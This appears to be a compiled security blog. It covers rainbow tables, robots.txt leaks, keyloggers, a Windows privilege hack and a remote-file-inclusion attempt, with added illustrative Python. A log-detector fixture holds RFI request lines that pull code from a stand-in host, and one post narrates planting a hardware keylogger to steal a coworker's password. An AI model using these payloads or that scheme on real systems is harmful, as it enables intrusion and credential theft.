Viruses, Hacking, and Security


BlueProximity

BlueProximity - GNOME Bluetooth device distance detection and automatic locking tool :-): What a great idea. Of course, I keep my cell phone on my desk or in my coat pocket half the time, so I’m still screwed.

This software helps you add a little more security to your desktop. It does so by detecting one of your bluetooth devices, most likely your mobile phone, and keeping track of its distance. If you move away from your computer and the distance is above a certain level (no measurement in meters is possible) for a given time, it automatically locks your desktop (or starts any other shell command you want).

Cable Disruption Primer

Once, sure. Twice, Maybe. Three? Four!?!: A good roll-up of news and theories about all the Internet cable cutting going on lately, full of good links.

On a related note, Iran has recently announced plans to move to trade oil with the Euro rather than the US dollar, which will cause further devaluing of the greenback. Saddam Hussein was in the process of doing the same before the US invasion, a decision reversed by the occupying force.

Some are interpreting this as signs of an “info war” […]

There’s also a Wikipedia page.

The Russian Hacking Culture

Scam Czars: What’s Russian for ‘Hacker’?: An interesting article that attempts to explain why so many hackers come from Russia.

Russia has long had a strong system of math and science education, and until the relatively recent upturn in the economy, the multitudes of whiz kids who graduated from its schools often had poor job prospects.

At the same time, they were entering a society that for decades had built up a deep skepticism about the virtues of following the rules. Under Communism, the thicket of strictures that governed almost every aspect of life was considered so inane that only fools were thought to abide by them.

[…] One result was that corruption was rampant in Soviet times, and has endured, if not gotten worse.

Remember, there are only 194 countries in the world...

Official: International hackers going after U.S. networks: 140 of 194 is…72% of the world, trying to hack our government. Nice.

About 140 foreign intelligence organizations are trying to hack into the computer networks of the U.S. government and U.S. companies, a top counterintelligence official said.

The nation’s electronic systems are too easy to hack, and the number of world-class hackers is “multiplying at bewildering speed,” he said at a symposium on cyber security Friday.

That, he said, has transformed the nature of counterintelligence: “If you can exfiltrate massive amounts of information electronically from the comfort of your own office on another continent, why incur the expense and risk of running a traditional espionage operation?”

"the first major motion picture to accurately portray a hack"

Matrix Sequel Has Hacker Cred: An old article, but one I’d missed up until now: apparently “The Matrix Reloaded” contains the rarest of cinematic rarities — an accurate hack attempt.

An Nmap port scan is a common prelude to an intrusion attempt — a way of casing the joint, to find out if any vulnerable services are running.

That’s exactly how the fictional Trinity uses it. In a sequence that flashes on screen for a few scant seconds, the green phosphor text of Trinity’s computer clearly shows Nmap being run against the IP address 10.2.2.2, and finding an open port number 22, correctly identified as the SSH service used to log into computers remotely.

“I was definitely pretty excited when I saw it,” says “Fyodor,” the 25-year-old author of Nmap. “I think compared to previous movies that had any kind of hacking content, you could generally assume it’s going to be some kind of stupid 3D graphics show.”

Here’s an image of the scene.

Storm

Gathering ‘Storm’ Superworm Poses Grave Threat to PC Nets: Lemme tell you: if Bruce Schneier is even a little afraid, then I’m curled up in a fetal position somewhere rocking back and forth.

Worms like Storm are written by hackers looking for profit, and they’re different. These worms spread more subtly, without making noise. Symptoms don’t appear immediately, and an infected computer can sit dormant for a long time. If it were a disease, it would be more like syphilis, whose symptoms may be mild or disappear altogether, but which will eventually come back years later and eat your brain.

This part is really scary.

We simply don’t know how to stop Storm, except to find the people controlling it and arrest them.

Unfortunately we have no idea who controls Storm, although there’s some speculation that they’re Russian. The programmers are obviously very skilled, and they’re continuing to work on their creation.

Oddly enough, Storm isn’t doing much, so far, except gathering strength.

Rainbow Tables and Why Your Password Isn't Secure

Rainbow Hash Cracking: Think your password is secure?

The multi-platform password cracker Ophcrack is incredibly fast. How fast? It can crack the password “Fgpyyih804423” in 160 seconds. Most people would consider that password fairly secure.

This post is a nice introduction to the concept of “rainbow tables” and what they mean for security.
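To make the concept concrete, here is a toy rainbow table, added as an illustration for this entry. It is not code from the linked post or from Ophcrack: it uses SHA-256 over a constructed three-letter password space instead of LM hashes, and the chain length, chain count and salt value are arbitrary choices for the demo. The point it shows is the time/memory trade-off (a thousand stored endpoints reach tens of thousands of passwords) and why a per-user salt, which the demo’s h_salted stands in for, makes the precomputed table useless.

```python
import hashlib
import string

# Toy password space: 3 lowercase letters (26**3 = 17,576 candidates). Constructed for this demo;
# Ophcrack's real tables cover LM/NTLM hashes over a far larger character set.
ALPHABET = string.ascii_lowercase
PW_LEN = 3
SPACE = len(ALPHABET) ** PW_LEN
CHAIN_LEN = 50      # hashes per chain
NUM_CHAINS = 1000   # endpoints stored; the table reaches up to NUM_CHAINS * CHAIN_LEN passwords

def h(pw: str) -> bytes:
    """Unsalted hash: identical input gives identical output everywhere, which is what a
    precomputed table relies on."""
    return hashlib.sha256(pw.encode()).digest()

def h_salted(pw: str, salt: bytes) -> bytes:
    """Per-user salt (hypothetical scheme for the demo): the same password hashes differently
    on every account, so no single table can be precomputed."""
    return hashlib.sha256(salt + pw.encode()).digest()

def int_to_pw(n: int) -> str:
    """Index in [0, SPACE) -> candidate password."""
    out = []
    for _ in range(PW_LEN):
        out.append(ALPHABET[n % len(ALPHABET)])
        n //= len(ALPHABET)
    return "".join(out)

def reduce_to_password(digest: bytes, column: int) -> str:
    """Map a hash back into the password space. Mixing in the column number is what makes this
    a 'rainbow' table: each column uses a different reduction, which limits chain merges."""
    return int_to_pw((int.from_bytes(digest[:8], "big") + column) % SPACE)

def chain_member(start: str, column: int) -> str:
    """Password sitting in the given column of the chain that begins at start."""
    pw = start
    for col in range(column):
        pw = reduce_to_password(h(pw), col)
    return pw

def build_table(num_chains: int = NUM_CHAINS, chain_len: int = CHAIN_LEN) -> dict:
    """Precompute chains but store only endpoint -> [start points]; every intermediate
    password is recomputable on demand, so memory stays small."""
    table = {}
    for i in range(num_chains):
        start = int_to_pw((i * 7919) % SPACE)  # deterministic, spread-out start points
        endpoint = chain_member(start, chain_len)
        table.setdefault(endpoint, []).append(start)
    return table

def lookup(table: dict, target: bytes, chain_len: int = CHAIN_LEN):
    """Recover a preimage of target: assume the hash sits in column k, walk the chain to its
    end, and if that endpoint was stored, regenerate the chain from its start to find it."""
    for k in range(chain_len - 1, -1, -1):
        pw = reduce_to_password(target, k)
        for col in range(k + 1, chain_len):
            pw = reduce_to_password(h(pw), col)
        for start in table.get(pw, ()):
            cand = start
            for col in range(chain_len):
                if h(cand) == target:
                    return cand
                cand = reduce_to_password(h(cand), col)
            # otherwise a false alarm: a different chain merged into this endpoint
    return None

def coverage(table: dict, chain_len: int = CHAIN_LEN) -> float:
    """Fraction of the password space the table can actually recover."""
    seen = set()
    for starts in table.values():
        for start in starts:
            pw = start
            for col in range(chain_len):
                seen.add(pw)
                pw = reduce_to_password(h(pw), col)
    return len(seen) / SPACE

def demo():
    """Crack one covered password, then show the same password survives when salted."""
    table = build_table()
    pw = chain_member(int_to_pw(0), 5)  # guaranteed to be in the table
    cracked = lookup(table, h(pw))
    salted = lookup(table, h_salted(pw, b"per-user-salt"))
    return pw, cracked, salted, coverage(table)

if __name__ == "__main__":
    print(demo())
```

The defensive takeaway is in h_salted: the table is built against one hash function, so adding a salt the attacker did not precompute against pushes them back to brute force per account. The toy is tiny so it runs in a second; the real cost curve is the same shape, just larger.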

The FBI's Super Secret Spyware

FBI’s Secret Spyware Tracks Down Teen Who Made Bomb Threats: The FBI is using spyware to great effect, apparently.

FBI agents trying to track the source of e-mailed bomb threats against a Washington high school last month sent the suspect a secret surveillance program designed to surreptitiously monitor him and report back to a government server, according to an FBI affidavit obtained by Wired News.

The court filing offers the first public glimpse into the bureau’s long-suspected spyware capability, in which the FBI adopts techniques more common to online criminals.

Wordpress Download Cracked

WordPress 2.1.1 dangerous, Upgrade to 2.1.2: This is pretty bad. Yikes.

This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

It was determined that a cracker had gained user-level access to one of the servers that powers wordpress.org, and had used that access to modify the download file.

Robots.txt: A Cracker's Best Friend

Something fairly obvious hit me in the face yesterday: robots.txt files can be a cracker’s best friend.

We knew of someone who had a directory on their site filled with the install files and license keys of all their software so it would be easy to find. In a cursory nod to security, they put a “disallow” rule for this folder in their robots.txt file to ensure it wasn’t indexed. However, in doing this, they simply provided a handy record in a standardized location for anyone who was looking for something they were trying to hide.

How often does this happen, I wonder, and what does your robots.txt file reveal about your site? Yes, you can prevent search engines from indexing something (those that respect the file, anyway), but you’re also announcing to the world that there’s something there you don’t want anyone poking around in. (Remember when the White House tried this?). You may as well put out a “Start Hacking Here” sign.

If you have a secure area on your site, perhaps you’d do better with META tags?

<meta name="robots" content="noindex"/>

Same effect, but the “don’t index me” command is embedded in the page itself, which means you have to find it first.

Perhaps we should all go check our robots.txt files right now to see if there’s anything incriminating in them? Mine’s cool.
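For anyone taking that last suggestion literally, here is a small robots.txt audit script, added as an example for this entry (it is not from the original post). It parses the file the way crawlers group it (User-agent lines followed by Allow/Disallow rules), lists every Disallow path, and flags the ones whose names hint at something you might not want advertised. The sample file and the SENSITIVE_HINTS word list are constructed for the demo; point it at your own file by reading it into the text argument.

```python
# Constructed sample robots.txt, standing in for a site's real file.
SAMPLE_ROBOTS = """\
# Keep crawlers out of the scripts and the staff area
User-agent: *
Disallow: /cgi-bin/
Disallow: /software-keys/
Disallow: /admin/
Allow: /public/

User-agent: Googlebot
Disallow: /tmp/backups/
"""

# Path fragments that suggest a Disallow is hiding something rather than just saving crawl
# budget. Assumed heuristic list for the demo; tune it to your own site.
SENSITIVE_HINTS = ("admin", "backup", "key", "license", "private", "secret", "config", "install")

def parse_robots(text: str) -> dict:
    """Return {user_agent: [(field, path), ...]} following the usual grouping rules:
    one or more User-agent lines start a group, and the rules that follow apply to all of them."""
    groups = {}
    agents = []
    seen_rule = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if seen_rule:                      # a rule has been seen, so this starts a new group
                agents, seen_rule = [], False
            agents.append(value)
            groups.setdefault(value, [])
        elif field in ("disallow", "allow"):
            seen_rule = True
            for agent in agents:
                groups[agent].append((field, value))
    return groups

def audit(text: str) -> list:
    """List every Disallow path and flag the ones that look like they hide something."""
    findings = []
    for agent, rules in parse_robots(text).items():
        for field, path in rules:
            if field != "disallow" or not path:   # an empty Disallow means 'allow everything'
                continue
            hint = next((w for w in SENSITIVE_HINTS if w in path.lower()), None)
            findings.append({"agent": agent, "path": path, "flag": hint})
    return findings

def flagged_paths(text: str) -> list:
    """Just the paths worth a second look, in file order."""
    return [f["path"] for f in audit(text) if f["flag"]]

if __name__ == "__main__":
    for finding in audit(SAMPLE_ROBOTS):
        marker = f"  <-- looks like '{finding['flag']}'" if finding["flag"] else ""
        print(f"{finding['agent']:10} {finding['path']}{marker}")
```

Anything the script flags is a candidate for the META-tag approach above, or better, for real access control on the directory: a noindex tag keeps the path out of search results without publishing it, but neither mechanism stops a visitor who already has the URL.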

Defeating Keystroke Logging

We’ve talked a bit about keyloggers before, which can be a brutally effective way to capture passwords (see this post, this post, or this post).

But there’s a completely simple way to defeat them, based on the fact that a keylogger doesn’t know where on the page the focus is when you’re typing — it has no context, it just has what is typed.

So, next time you login from a public internet terminal or somewhere else you want to make sure your keystrokes aren’t being logged, do this —

Put the focus on the password field, and type one character. Then click somewhere else on the page — open Notepad if you have to — and type a bunch of random characters. Then, click back in the password field, and type another character. Repeat until your password is complete.

Extremely simple, extremely effective. Without the context of where the focus was when you were typing, the resulting string of characters is useless.

From this report at Alta Vista Security Group. Via Metafilter.
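A small simulation of the trick, added here as an example and not taken from the Alta Vista report or the post. It models each keystroke as (focused window, character) and shows two kinds of logger: one that records only the characters, for which the interleaved junk works exactly as described, and one that also records which window had focus, which recovers the password with a one-line filter. The password and the junk runs are constructed values; the junk runs deliberately vary in length, since typing the same number of junk characters every time would leave a fixed period in the log.

```python
from math import comb

PASSWORD = "hunter42"  # constructed sample, not a real credential
# Constructed junk typed into Notepad after each password character. Lengths vary on purpose.
JUNK_RUNS = ["q7x", "m3kp9", "zz1", "0plk", "ww4r2", "e9", "kq83m", "x0"]
PASSWORD_FIELD = "browser:login/password"

def simulate_typing(password: str, junk_runs: list) -> list:
    """Keystroke events as (focused_window, char): one password character in the login form,
    then click away and type a run of junk somewhere else, then click back."""
    events = []
    for ch, junk in zip(password, junk_runs):
        events.append((PASSWORD_FIELD, ch))
        for j in junk:
            events.append(("notepad", j))
    return events

def keys_only_view(events: list) -> str:
    """What a logger that records nothing but keystrokes captures."""
    return "".join(ch for _, ch in events)

def context_aware_recover(events: list, field: str = PASSWORD_FIELD) -> str:
    """What a logger that also records the focused window (or takes screenshots on each click)
    can do: discard everything typed outside the password field."""
    return "".join(ch for win, ch in events if win == field)

def subsequence_candidates(stream_len: int, pw_len: int) -> int:
    """Upper bound on the position sets a keys-only attacker must consider if they know the
    password length but not where the clicks happened."""
    return comb(stream_len, pw_len)

if __name__ == "__main__":
    ev = simulate_typing(PASSWORD, JUNK_RUNS)
    stream = keys_only_view(ev)
    print("keys-only logger sees:   ", stream)
    print("password appears intact? ", PASSWORD in stream)
    print("candidate positions:     ", subsequence_candidates(len(stream), len(PASSWORD)))
    print("context-aware logger gets:", context_aware_recover(ev))
```

The second logger is the caveat: the trick only buys anything against a logger with no notion of focus. A hardware logger inline on the keyboard cable (the kind discussed elsewhere on this page) is exactly that, but software loggers that record window titles or screenshots are not.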

What We're Up Against

I monitor the 404s on this site, and I found an interesting one today. It was an inbound request to:

/phpgwapi/setup/tables_update.inc.php?appdir=[deleted]

“phpgwapi” is an open source groupware toolkit. It must have a recorded exploit, because the deleted part was a URL that someone was trying to get phpgwapi to remotely include and execute.

I visited the URL and found an unparsed PHP page called “Defacing Tool Pro 3.0,” part of which is screencapped above (remember that it wasn’t parsed or executed, so there’s some random PHP code scattered around up there).

This baby has everything you could ever need to deface a Web site, including the ability to manipulate the file system, run interactive PHP, send arbitrary code through POST and GET, try common URLs for database administration tools, etc. Essentially, if you can get this to run on someone’s machine, it’s a control panel from which you can really screw with their Web site.
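Since the request above was only noticed because it happened to 404, here is a log check that would have caught it regardless of status, added as an example for this entry (not from the post). It parses Apache combined-format lines and flags any request where a query parameter’s value is itself a URL, which is the tell-tale shape of a remote file inclusion attempt. The log lines are constructed: the addresses are from the documentation ranges and example.invalid is a reserved name, so nothing here is a real host or indicator.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines. 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges and example.invalid is a reserved name: not real hosts or IoCs.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2007:02:14:33 -0500] "GET /phpgwapi/setup/tables_update.inc.php?appdir=http://example.invalid/tool.txt HTTP/1.1" 404 512 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2007:02:15:01 -0500] "GET /2007/03/some-post/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2007:02:15:09 -0500] "GET /search/?q=robots.txt HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2007:02:16:47 -0500] "GET /index.php?page=https://example.invalid/include.txt HTTP/1.1" 200 912 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def parse_line(line: str):
    """Split one combined-format line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_remote_includes(log_text: str) -> list:
    """Flag requests where any query parameter value is a URL. The status code is recorded
    but not used as a filter: on a host that actually runs the targeted app the same
    request would come back 200, not 404."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # parse_qsl percent-decodes values, so an encoded "http%3A%2F%2F" is still caught
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if REMOTE_SCHEME_RE.match(value):
                hits.append({
                    "ip": rec["ip"], "time": rec["ts"], "path": parts.path,
                    "param": key, "included_url": value, "status": int(rec["status"]),
                })
    return hits

def sources(hits: list) -> Counter:
    """Attempts per source address, which is what you would block or report."""
    return Counter(h["ip"] for h in hits)

if __name__ == "__main__":
    for hit in find_remote_includes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['path']} {hit['param']}={hit['included_url']}")
    print(sources(find_remote_includes(SAMPLE_LOG)))
```

On the application side the fix is the usual one: never pass a request parameter to include or require, and on PHP hosts where you can, turn allow_url_include off so a remote URL cannot be included at all.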

Pedophile Communities Thrive on the Net

On the Web, Pedophiles Extend Their Reach: This is an interesting — albeit horrifying — article about the burgeoning pedophile communities on the Web. The combination of anonymity and remote congregation makes it possible for shunned corners of society to operate “in the open.”

Today, pedophiles go online to seek tips for getting near children — at camps, through foster care, at community gatherings and at countless other events. They swap stories about day-to-day encounters with minors. And they make use of technology to help take their arguments to others, like sharing online a printable booklet to be distributed to children that extols the benefits of sex with adults.

And at the risk of just trying to freak people out, this part made me a little ill:

[…] elsewhere in cyberspace, the second group celebrated the news that one of their own had been offered a job leading a boys’ cabin at a sleep-away camp.

But participants in the conversation did not focus on the work. “Hope you see some naked boys in your cabin,” a man calling himself PPC responded. “And good luck while restraining yourself from doing anything.”

Keystroke Logging in Action

Lessons Learned from Biggest Bank Heist in History: In the comments on yesterday’s post about hardware keystroke loggers, someone posted a link to this story about a near-heist at the Japanese bank, Sumitomo Mitsui. Would-be robbers used this exact attack.

By installing software keystroke loggers on the PCs that belonged to the bank personnel responsible for wire transfers over the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network, the thieves captured credentials that were then used to transfer 220 million pounds (call it half-a-billion dollars).

Apparently, Sumitomo Mitsui now superglues their keyboards into the machines.

Hardware Keystroke Logging

Say you work in a company and are up for a promotion. You want to negotiate your salary effectively, but to do this, you need to know what others in that position are making. How do you get into the Human Resource records?

Bob, who has a cube across the hall, is the DBA. He could get in there, but how do you get his password? Your network is monitored and audited pretty closely. You can’t do anything to steal his password “on the network” which might get logged and would be traceable to you.

Enter this little device:

This USB keyboard logger has a huge 2MB or 4MB memory capacity, organized into an advanced flash file system. Super fast data retrieval is achieved by switching into pendrive mode for download. Completely invisible for computer operation…

It comes in USB and PS/2 models and costs less than $100. (No link, lest I be accused of encouraging this. You can find these things easily enough if you want to.)

One night, you work late, then you unplug his keyboard, plug this device into his computer, then plug his keyboard into the device. His computer is way under his desk, so he’ll never see it. You retrieve the device the next evening and download all his keyboard input for the entire day from the internal Flash memory. It wouldn’t be hard to pick out his password, and now you’re him.

This is unlike a software keyboard logger because there’s no evidence left behind. No process that runs in the background, no need to install anything on his machine, etc. It’s like stabbing someone with an icicle — no evidence gets left behind.

All you security types out there — how do you defend against this? Do they sell encrypting keyboards, which encrypt data sent down the keyboard cable and decrypt it on the machine?

Microsoft Spits into the Wind

Microsoft to hackers: Take your best shot: I’m fascinated to see how this is going to work out.

After suffering embarrassing security exploits over the past several years, Microsoft Corp. is trying a new tactic: inviting some of the world’s best-known computer experts to try to poke holes in Vista, the next generation of its Windows operating system.

Microsoft made a test version of Vista available to about 3,000 security professionals Thursday as it detailed the steps it has taken to fortify the product against attacks that can compromise bank account numbers and other sensitive information.

Windows User Account Escalation Hack

Liquid Web Project Streamer - r0t0r00t3r: For the record, this hack works exactly as they display here. Anyone can effectively open a Windows shell (explorer.exe) as the SYSTEM account. I don’t know the specifics of what this allows you to do, but it sure looks scary.

This could probably come in handy if I ever lost the admin password for a machine. But can it really be this simple?

(Warning: Embedded video, profane soundtrack. Fred Durst hates you, man)

Picture-Based Anti-Phishing Device

I just saw an ad on TV from Bank of America touting a new anti-phishing measure.

From what I could gather, you can pick or upload a picture. When you’re using the BOA Web interface, that picture will be displayed somewhere on the page.

The idea behind this is that a phishing site wouldn’t know what picture you had picked, so they couldn’t display it. So if you pick a picture of your cat, then you just need to make sure Fluffy is staring back at you from every page. That way you know you’re still on the BOA site and haven’t been hijacked by phishers.

Good idea? I’m not really sure.

Mac securit....oh....no!

Benjamin Daines was browsing the Web when he clicked on a series of links that promised pictures of an unreleased update to his computer’s operating system.

Instead, a window opened on the screen and strange commands ran as if the machine was under the control of someone — or something — else.

“It just shows people that no matter what kind of computer you use you are still open to some level of attack,” said Daines, a 29-year-old British chemical engineer who once considered Macs invulnerable to such attacks.

Just like I have always thought. Everything is vulnerable. It just depends who is targeted the most.

Entire article here.

SFTP on Windows

Setting up a SFTP Server on Windows: Joe has me so paranoid about security these days that I shun FTP. We run all our stuff on SFTP, and they’re all Linux servers, so this isn’t a problem.

However, we’re bringing a publicly-exposed Windows server online, and I’m a little nervous about it. So, I was happy to find this resource with good instructions for SSHWindows, an SSH server for Windows.

It’s simple to set up, and it works well. I got SFTP running on my Windows server in about five minutes, giving me a little more ability to sleep at night.